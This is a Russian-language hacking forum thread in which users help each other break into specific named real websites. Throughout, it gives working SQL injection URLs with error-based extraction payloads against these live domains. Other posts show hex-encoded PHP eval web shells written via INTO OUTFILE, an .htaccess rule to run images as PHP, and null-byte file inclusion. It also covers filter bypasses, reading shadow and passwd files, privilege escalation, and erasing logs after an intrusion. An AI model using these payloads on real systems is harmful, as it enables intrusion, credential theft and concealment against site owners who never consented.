Та мало ли, вдруг ему нужно не целые таблицы а некоторые колонки из них.


skagen said:
почему это хекали? может просто версия базы данных античатовская? или я что то не понимаю? нах в конфиге писать про ачат. про какой индекс ты говоришь? главную страницу сайта? там есть обращение к базе?


естественно есть, а как по твоему скрипт выводит инфу из базы?

тебе ещо раз говорят, просмотри все файлы что инклудятся в скрипте, там в какомто из них будут данные от БД

маленький ввопросец, ато гугл не помог, где на сервере хранятся пароли от фтп?

qaz said:
маленький ввопросец, ато гугл не помог, где на сервере хранятся пароли от фтп?


Смотри какой фтп серв используется, далее гугли дефолтные конфиги(пути) для него, а хитрожопый админ может засунуть и оч глубоко конфиг.

kise said:
В общем, по своей дурости, сегодня взломал сайт не включив впн
Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.
После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...
Как мне почистить логи, особенно со своим ip?
+++
Если не там запостил, извините, не знал куда можно запостить.
Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.


Я даже проксей не юзаю, за мной выехали?

sh: no job control in this shell
sh-3.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-3.1$ which gcc
which: no gcc in (/sbin:/usr/sbin:/bin:/usr/bin)
sh-3.1$ cd /www/comilfo.ru/ar/
sh-3.1$ gcc -o c c.c
sh: gcc: command not found
sh-3.1$


Вот как то так. Что теперь мне делать?

kise said:
Вот как то так. Что теперь мне делать?


cc, gpp, cpp пробуй

Mr.Snuffer said:
cc, gpp, cpp пробуй


------------


sh-3.1$ cpp -o c c.c
c.c:2:19: error: stdio.h: No such file or directory
c.c:3:19: error: errno.h: No such file or directory
c.c:4:20: error: stdlib.h: No such file or directory
c.c:5:20: error: string.h: No such file or directory
c.c:6:20: error: malloc.h: No such file or directory
c.c:7:20: error: limits.h: No such file or directory
c.c:8:20: error: signal.h: No such file or directory
c.c:9:20: error: unistd.h: No such file or directory
c.c:10:21: error: sys/uio.h: No such file or directory
c.c:11:22: error: sys/mman.h: No such file or directory

kise, тащи эти файлы с собой stdio и.т.д этих заголовочных файлов на серве нет, но судя по тому что ошибки лезут компилятор таки есть.

Что можно извлечь из файла etc/passwd ато там столько всего что можно голову сломать?

http://ru.wikipedia.org/wiki/Salt#.D0.A3.D1.80.D0.BE.D0.B2.D0.BD.D0.B8_.D0.B7.D 0.B0.D1.89.D0.B8.D1.82.D1.8B

И реши что именно тебе надо и надо ли вообще.

Столкнулся вот с токой проблеммой,чтобы прочитать файл нужно путь к файлу представить в hex,а теперь сижу и ломаю голову а как же теперь шела залить обычным запросом +union+select+1,2,3,'',5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- не получается пробовал уже и так +union+select+1,2,3,0x3c3f706870206576616c28245f47 45545be2809865e280995d29203f3e,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'--

и даже так +union+select+1,2,3,'0x3c3f706870206576616c28245f4 745545be2809865e280995d29203f3e',5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- ничего не выходит.Помогите пожалуйста

Facecontrol said:
Столкнулся вот с токой проблеммой,чтобы прочитать файл нужно путь к файлу представить в hex,а теперь сижу и ломаю голову а как же теперь шела залить обычным запросом +union+select+1,2,3,'',5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- не получается пробовал уже и так +union+select+1,2,3,0x3c3f706870206576616c28245f47 45545be2809865e280995d29203f3e,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'--
и даже так +union+select+1,2,3,'0x3c3f706870206576616c28245f4 745545be2809865e280995d29203f3e',5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- ничего не выходит.Помогите пожалуйста


Если это магические ковычки, то +'/var/www/html/azaz.html'- тоже хексить надо.

OxoTnik said:
Facecontrol
а у твоего юзера права есть? и есть права на папку куда ты пытаешься залить шел?
и добавь в запрос
20,21
+from+mysql.user
+into+outfile+'/home/site.com/www/shell.php


File_priv Y а как проверить права на папку куда лить шелл?

OxoTnik said:
ковычки должны быть оригинальными без шифрования, иначе никак


Вот дерьмо

Mr.Snuffer said:
Если это магические ковычки, то +'/var/www/html/azaz.html'- тоже хексить надо.


и так пробовал не получается

во первых: кодирование ковычек нельзя использовать в INTO OUTFILE. Ибо мускул требует строку, а следовательно должны быть кавычки. Не путайте то, что выдает мускул в выводе - там где можно делать тот же хекс и то что на инпуте попадает в сам мускул.

Далее: Права на директории только самым непосредственным методом можно узнать - пробовать в них заливать. Конечно есть ряд стандартных директорые имеют больший шанс иметь права на запись как -то : /temp,/upload etc. Но! Смотрите сразу под каким юзером живет веб-сервер и используется ли UID-GID(suexec, ITK etc). Могут иметь место ситуации , когда сам PHP может иметь полный доступ к директориям и папкам, а USER MYSQL через которого ты делаешь OUTFULE - нет.

Ищи интерфейсы для работу с mysql , а-ля PHPMYADMIN. Проверяй удаленный коннект, пробуй через reverse-IP.

Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать.


root:$1$IQFgYfgK$Eip37UYMldc5jJiRGLQky0:14134:0:99 999:7:::
bin:*:12851:0:99999:7:::


Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?

kise said:
Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать.
Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?


root как правило имеет uid 0


и как мне впоследствии войти под ним?


user имя пользователя

А, вспомнил!

su username

Выполняю, но мне пишет вот это:


sh-3.1$ su adm
standard in must be a tty


--------------

Я не могу зайти под другим пользователем... Что делать?



Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158

kise said:
А, вспомнил!
su username
Выполняю, но мне пишет вот это:
--------------
Я не могу зайти под другим пользователем... Что делать?


Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158


Судя по всему через backconnect ?

Это означает, что текущая сессия не привязана к псевдотерминалу. Пробуй ssh youruser@localhost. Но не файт что получится, так как есть ряд граничных условий.

нет, к сожалению


sh-3.1$ ssh adm@localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
Could not create directory '/var/www/.ssh'.
Host key verification failed.

Блин ничего не получатся вообще

http://www.girlsweb.org/registerNew.php

поле email и username вроде как уязвимы...получилось раскрутить только как blind-sql inj...возможно ли с 1-2 запросов залить шелл?

magic_quotes_gpc = On

http://allinstyle.ru/?index.php'or(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and(1)='1

http://discoverytravel.ru/next.php?pid=2'or(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1

Видно в ОПЕРЕ.

Вот подобного рода инъекции с запретами на пробелы, кроме версии базы, можно что-нибудь выводить? Tiger ответил, спасибо ему, но а как дальше? мануалы предательски молчат. пичалька.

Они вообще юзабельны? Или ограничиваться номером версии это уже найс?

asiaman

Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все

http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version( ))))and'1

Ну или:

https://rdot.org/forum/showpost.php?p=20287&postcount=12

Tigger said:
asiaman
Скуля там в URI.
http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)
http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()
Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).
Вывод версии в ошибке:
http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1
Duplicate column name '
5.0.88-log
'
asiaman
Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все
http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version( ))))and'1
Ну или:
https://rdot.org/forum/showpost.php?p=20287&postcount=12


Про ф-цию ExtractValue, спасибо. Она работает в старших версиях.

Но вот в http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1 как быть?

Вариант


Code:
предложил использовать `` в name_const

в


Code:
1'and(1)=(select*from(select*from(information_sche ma.tables`a`)JOIN(information_schema.tables`b`)usi ng(TABLE_CATALOG,TABLE_SCHEMA))c)='1

выдает ошибку.

З.Ы. Ваши ответы я вообще себе в блокнот сразу копирую. Очень полезные, уникальны (по крайней мере для меня) и часто универсальные. Спасибо.

________________________________________________

Например, если ругается на этот символ ` , т.е. https://rdot.org/forum/showpost.php?p=20287&postcount=12 не проходит в запросе этот символ. На что можно его заменить?

asiaman

Там же написано. Запросы надо посылать не через браузер.


GET http://develop.belta.by/1'and(1)=(select*from(select*from(information_sche ma.tables`a`)JOIN(information_schema.tables`b`)usi ng(TABLE_CATALOG,TABLE_SCHEMA))c)='1


Результат:

Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.
Duplicate column name 'TABLE_NAME'

Данная реализация не идеальна, но имеет место быть.

В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).

Tigger said:
asiaman
Там же написано. Запросы надо посылать не через браузер.
Результат:
Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.
Duplicate column name '
TABLE_NAME
'
Данная реализация не идеальна, но имеет место быть.
В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).


tnx

а как Вам такая реализация?

1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1

в смысле используя like и data_length

asiaman said:
tnx
а как Вам такая реализация?
1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1
в смысле используя like и data_length


http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('TABLE%'))) ))='1

error - Subquery returns more than 1 row

http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('VIEWS%'))) ))='1

error - XPATH syntax error: ':information_schema.VIEWS'

Опять же, все упирается в LIMIT.

Tigger said:
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('
TABLE
%')))))='1
error - Subquery returns more than 1 row
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('
VIEWS
%')))))='1
error - XPATH syntax error: ':
information_schema.VIEWS
'
Опять же, все упирается в LIMIT.


от части. оператор like - это смысловой оператор. но с грехом по пополам - можно работать. хотя, я посмотрю. где-то увидел интересный шаблон, там через chr обходит все и даже пробелы работают.

__________

погарячился.


Code:
You don't have permission to access

Посоны, 403 на union

Способы обойти есть, или забыть?

Помогите пожалуйста с WP 2.9.2

при переходе на _tp://www.site.com/?p=0 открывает главную страницу, но url в строке не меняется на _tp://www.site.com/

А при переходе на _tp://www.site.com/?p=1 выдаёт


WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND meta_value!='' ORDER BY meta_key ASC' at line 1]
SELECT * FROM wp_krivov_foot34_postmeta WHERE post_id = AND meta_value!='' ORDER BY meta_key ASC


и


Извините, не найдено записей совпадающих вашим критериям


как мне подобраться к базе, вытащить лог. пасс. админа? Заранее спасибо

Вопрос следующего плана: заливка шелла через картинку.

Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.

Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.

Прошу подсказать варинты. Или забить?

spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user

http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+

http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+

что не так?Помогите докрутить.

ReV0LVeR said:
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+
что не так?Помогите докрутить.


ты пути от фонаря нарисовал? там ковычка вызывает ошибку, тоесть фиг ты запишешь чтото в файл, да и права врятли есть


asiaman said:
Вопрос следующего плана: заливка шелла через картинку.
Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.
Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.
Прошу подсказать варинты. Или забить?


вариант искать на сайте инклуд, иначе никак

Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'

a

Файл:









',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:

HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1 ' at line 3 (# 256).

The following will be reported to the Administrator:

Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается

mq=on

Ereee said:
mq=on


А как их обойти можно?

Facecontrol said:
Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'

a

Файл:

',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1 ' at line 3 (# 256).
The following will be reported to the Administrator:
Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается



Только HTML формы, только хардкод!!11

1. Да, там magic_quotes.

Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.

Вот сам способ:

/showpost.php?p=663815&postcount=39

2. Ты уверен, что у твоего пользователя есть file_priv? =\

3. HTML - это крута!!1

Tigger said:
Только HTML формы, только хардкод!!11
1. Да, там magic_quotes.
Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
Вот сам способ:
/showpost.php?p=663815&postcount=39
2. Ты уверен, что у твоего пользователя есть file_priv? =\
3. HTML - это крута!!1


Уверен что у него Y я файлы могу читать

Даже те методы обхода не помогают или я не понл как им пользоваться

Facecontrol said:
Даже те методы обхода не помогают или я не понл как им пользоваться


Значит не повезло.

Делай


Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user

Дальше ищи phpmyadmin.

Ereee said:
Значит не повезло.
Делай

Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user

Дальше ищи phpmyadmin.


А как его найти?

Facecontrol said:
А как его найти?


ищеш дерикторю

/showpost.php?p=3107725&postcount=2

Возник вопрос:

Как вывести все базы данных database() ?

x1ds said:
Возник вопрос:
Как вывести все базы данных database() ?


schema_name from information_schema.schemata

mironich said:
Смотри какой фтп серв используется, далее гугли дефолтные конфиги(пути) для него, а хитрожопый админ может засунуть и оч глубоко конфиг.


а можно подобнее? где что смотреть что гуглить?

Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?

Подскажите, кто-нибудь пользовался данной багой?

Если наглядный пример использования?

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180

Nginx buffer underflow vulnerability

Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.

Affected items

Web Server

The impact of this vulnerability

Remote attackers may execute arbitrary code via crafted HTTP requests.

swat_ said:
Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?


ставишь шелл http://profexer.name/pas/download.php

- Файловый менеджер :

групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий.

переименование и создание файлов и директорий.

правка, просмотр, изменении атрибутов файлов.

поиск файлов и директорий, текста в файлах.


swat_ said:
есть еще шеллы на подобие этого?
именно этот не хочет работать


Нормально все работает, просто вводи желаемый логин и пароль - скачаешь зашифрованный шелл. Только не забудь потом эти самый логин/пароль - подсмотреть их не будет где

shell_c0de said:
ставишь шелл http://profexer.name/pas/download.php
- Файловый менеджер :
групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий.
переименование и создание файлов и директорий.
правка, просмотр, изменении атрибутов файлов.
поиск файлов и директорий, текста в файлах.



есть еще шеллы на подобие этого?

именно этот не хочет работать

delete

Есть сайт с php include

Вид: index.php?sub_cat=

В начале добавляется sub/ , в конце .php

Попробовал получить /etc/passwd с нулевым байтом в конце, сработало.

Конструкция вида ../../../../../../../../../../etc/passwd%00 отлично работает, sub/ в начале не добавляется.

Возникает вопрос, а как залить шелл? Как отбросить в начале sub/ ?

Через /proc/self/environ не получается, данные не пишутся

sub ты откидываешь когда выходишь из деректории, т.е. типа ../../..

Насчет шела, иши все что можно проинклудить, логи, письма, картинку может может залить можешь там, фичу с протоколом data тоже попробуй. Тут где то были пару статей которые нормально тему сисек раскрывают.

ок спасибо, буду пробовать

http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+

как тут обойти фильтрацию юниона?

З.Ы. разобрался, короче это из-за разных кодировок..

convert(table_name+using+нужная кодировка)

ток в моем случаи хз как узнать нужную...

smirk said:
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...



Там union не фильтруется. нет правна просмотр schema.tables.

http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.columns+wher e+column_name+like+0x25696425--+

такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его

http://сайт.ру/userfiles/image/222_20110623183746.php

открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess?

если да то с каким содержимым?

попробуй с таким содержимым


Code:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg

пишу сканер SQLi

подскажите наиболее часто встречающиеся параметры на страницах

мой список:


Code:
id
page
num
name
p
n

нужно найти еще парочку популярных

\/ITA said:
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:

Code:
id
page
num
name
p
n

нужно найти еще парочку популярных


Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.

...результаты по запросу (inurl:"php?параметр=1"):

c - 31 900 000

cat - 21 300 000

category - 7 560 000

CatID - 4 850 000

pagina - 3 660 000

PID - 2 180 000

sn - 116 000

catalogid - 12 600

mix0x0 said:
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600


спасибо за подсказку

нашел скулю в POST на одном сайте подставил site.ru?id=1"

выдает мне такое:


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query :
INSERT INTO
ips(ip, cnt, last_url)
VALUES("***.93.28.***", 1,"/?id=1"")
ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""

я еще не пробовал инжектить в Insert или Update

где можно почитать посмотреть как это делается?

mix0x0 said:
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600


Сканеры - гавно, лучше руками искать.

Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?

хееелп ми

\/ITA said:
спасибо за подсказку
нашел скулю в POST на одном сайте подставил
site.ru?id=1"
выдает мне такое:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query :
INSERT INTO
ips(ip, cnt, last_url)
VALUES("***.93.28.***", 1,"/?id=1"")
ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""

я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?


,(select+1+from(select+count(*),concat((select+tab le_name+from+information_schema.tables+limit+0,1), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)

Tigger said:
asiaman
Ну или:
https://rdot.org/forum/showpost.php?p=20287&postcount=12




Code:
1'and(1)=(select*from(select*from(information_sche ma.tables`a`)JOIN(information_schema.tables`b`)usi ng(TABLE_CATALOG,TABLE_SCHEMA))c)='1

1060: Duplicate column name 'Table_Name'

Здесь понятно. Спасибо. Мы просто делаем листинг таблиц и столбцов.

Собственно вопрос. Нашли таблицу, вывели все имена столбцов. Можно ли использовать этот шаблон с join + using/on для вывода через ошибку дубля (как выше) записей из таблиц?

При условии, что пробелы запрещены, limit, order, соответственно, запрещены. А name_const будет работать только на вывод version（） (из-за баги - другое не выводит). ExtractValue - в этой ветке 5.0.x отсутствует.

Или какие еще есть варианты по выводу в таком случае?

Здесь http://www.xakep.ru/post/50554/?print=true и здесь /threadnav119047-1-10.html ответов, к сожалению, не нашел

__________________________________________________ ____

Еще вопрос. Вот http://www.efanli.com.cn/article_list.php?cid=1 блинд, как я понимаю, там запрет на обращение к схеме. Через блинд можно вывести пути, юзера, базу и др. НО, как подобраться к таблицам и соответственно, к записям таблиц?

Нужна помощь,как можно найти уязвимость в таком типе http://reg.piratua.ru/ ?

такой вопрос, получил доступ в phpmyadmin

хотел скачать

etc/passwd

ввожу запрос

SELECT load_file( '/etc/passwd' )

нормально выдало

load_file('/etc/passwd')

[BLOB - 1.2 КБ]

но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит,

ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?

qaz said:
такой вопрос, получил доступ в phpmyadmin
хотел скачать
etc/passwd
ввожу запрос
SELECT load_file( '/etc/passwd' )
нормально выдало
load_file('/etc/passwd')
[BLOB - 1.2 КБ]
но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит,
ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?


Показ в HEX отключи или в таблицу заноси.

Когда делаешь запрос над результатами будет Options. Клацаешь и галочку на show blob content

Seravin said:
Когда делаешь запрос над результатами будет Options. Клацаешь и галочку на show blob content


чтобы в параметрах невыставил нифига не катит,

ни Показать BLOB содержимое ни Развернутое отображение данных

Ereee said:
Показ в HEX отключи или в таблицу заноси.


не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?

попробовал так


PHP:
insert into`db.a` (`text`)VALUES('(select load_ file('/etc/passwd'))')



выдпло ошибку, как правельние?

qaz said:
не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?
попробовал так

PHP:
insert into`db.a` (`text`)VALUES('(select load_ file('/etc/passwd')')



выдпло ошибку, как правельние?


убери кавычки, у тебя стринг получается, а не выполняющаяся функция

((select load_file('/etc/passwd'))

Ereee said:
Значит не повезло.
Делай

Code:
select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user

Дальше ищи phpmyadmin.


нет походу просто я неправильно пользуюсь тем примером.Вот я а локалхосте пробую пользоваться,и ввожу как в том примере

http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C656374202 7393939272C3131312F2A,2,3/* поидее как там пишется должно вывести 2:3

999:111 но выводит -2 union select '999',111/* вот такие дела

Ни как не могу разобраться с rewrite mode. Залил шелл на сайт. При обращении на /store/checkout/payment_info/xxxxxxxx, где xxxxxxxx уникальный ID, выводится определенная инфа. Все перекопал, но не могу найти тот скрипт на шелле, который обрабатывает ID и выводит инфу. Сервак очень большой, с реврайтом очень плохо знаком. Как можно узнать?

как узнать полный путь к корню сайта,если в ошибках его нету?

Помогите не могу залить шелл на сайт,хочу залить WSO уже залил файл для закачки шелла,заливаю шелл,перехожу на страницу с шелом,а там показан код шелла,и страница ещё не успев полностью загрзиться,закрывается,и перебрасвает меня на страницу с ошибкой,где написанно,что подключение закрыто удаленным сервером.

Срочно нужен shell для sql возможности (Изменить , сохранить , удалить ) Киньте ссылку плиз .

Groove said:
Срочно нужен shell для sql возможности (Изменить , сохранить , удалить ) Киньте ссылку плиз .


а сам не пробовал искать?

шелл на php тык (http://forum.antichat.net/threadnav103155-1-10.html)

он наверно не про это имел ввиду,а про то чтобы не запросом всё это делать а просто нажал изменить,сохранить.

не видел я правда ещё таких шеллов,но можешь небольшой скрипт закинуть и использовать называется так MySQL RST/GHC Manager(весит гдето 100 kb)

Имел кто дело с SFTcms v 2.0?

Картинки заливаются, но куда, черт ногу сломит =/

shadowrun said:
Имел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/


Качай исходники смотри что куда, но 60% что в БД ищи другие пути.

mironich said:
Качай исходники смотри что куда, но 60% что в БД ищи другие пути.


бло, исходники нагуглить не могу... Мб есть у кого?

http://www.si-ultra.biz/catalog/seria.php?k=-12+union+select+1,2,3+--+


Как крутить без еррорбазед?

shadowrun said:
Как крутить без еррорбазед?


Всмысле как?


Code:
http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f

Тайтл смотри

Ereee said:
Всмысле как?

Code:
http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f

Тайтл смотри


Сенк! А если в тайтле вывода бы не было?

http://www.nashpereviznuk.net/PRINT.php?r=news&new=4664+union+select+1,2,3,4,5,6,7,8,9,10,11+--+


wtf?

shadowrun said:
wtf?


http://www.nashpereviznuk.net/print.php?r=news&new=-4664+union+select+1,version(),3,4,5,6,7,8,9,10,11--+


PRINT.php


wtf?


+--+


wtf?

Хелп ми )) фильтруется union, что можно сделать?

Пробовал:

-разным регистром написать

-/*!UnIoN*/

при нахождении union в запросе выдает The requested URL was not found on this server.

Kraneg said:
Хелп ми )) фильтруется union, что можно сделать?
Пробовал:
-разным регистром написать
-/*!UnIoN*/
при нахождении union в запросе выдает The requested URL was not found on this server.


https://rdot.org/forum/showthread.php?t=60

Нашел скулю в пост запросе. Помогли её раскрутить. Но такая проблема, в роботс прописано вот что:


Code:
User-agent: *
Crawl-delay: 5 #
Disallow: /admin/
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/
Disallow: /search/?s*

при переходе на /admin вылезает бейсик авторизация, лог пас пара не верная. Что делать?

предполагаю что это джумла, а админка как бы тут /administrator/

HAXTA4OK said:
предполагаю что это джумла, а админка как бы тут /administrator/


/administrator/ тоже выдает бейсик авторизацию

Cherep

попробуй через load_file вытащить то что в корне сайта в .htpasswd

